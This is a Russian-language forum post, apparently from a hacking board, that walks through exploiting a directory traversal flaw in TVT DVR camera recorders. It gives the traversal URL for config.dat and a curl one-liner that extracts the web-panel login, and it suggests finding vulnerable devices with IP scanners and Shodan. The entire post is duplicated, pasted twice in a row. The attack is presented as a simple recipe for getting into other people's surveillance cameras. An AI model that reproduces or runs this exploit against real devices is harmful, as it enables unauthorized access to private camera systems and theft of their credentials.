- Автор темы
- #1
Всем привет, хочу донести до Вас информацию, может и есть в открытом доступе но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даже на Украине на донбасе в последние время начали в мелькать подобные сообщения.
Информация
Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом «TVT TD-2308SS-B DVR directory traversal», — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.
Адрес где лежит конфигурационный файл.
http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
1
http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
Парсинг
Именно для меня на данный момент такой способ парсинга самый актуальный.
Использую я Advanced IP Scanner — линк на офф линк на офф
Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download
Вот такой вид имеет панель входа.
Вот код самого експлойта
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2 /dev/null | strings
1
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2 /dev/null | strings
Вот пример
Ну и все в итоге у нас юзер и пасс от панели
Maybe End
Все очень и очень просто.
Есть еще поисковик Shodan через который тоже можно искать камеры.
Информация
Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом «TVT TD-2308SS-B DVR directory traversal», — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.
Адрес где лежит конфигурационный файл.
http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
1
http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
Парсинг
Именно для меня на данный момент такой способ парсинга самый актуальный.
Использую я Advanced IP Scanner — линк на офф линк на офф
Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download
Вот такой вид имеет панель входа.
Вот код самого експлойта
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2 /dev/null | strings
1
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2 /dev/null | strings
Вот пример
Ну и все в итоге у нас юзер и пасс от панели
Maybe End
Все очень и очень просто.
Есть еще поисковик Shodan через который тоже можно искать камеры.
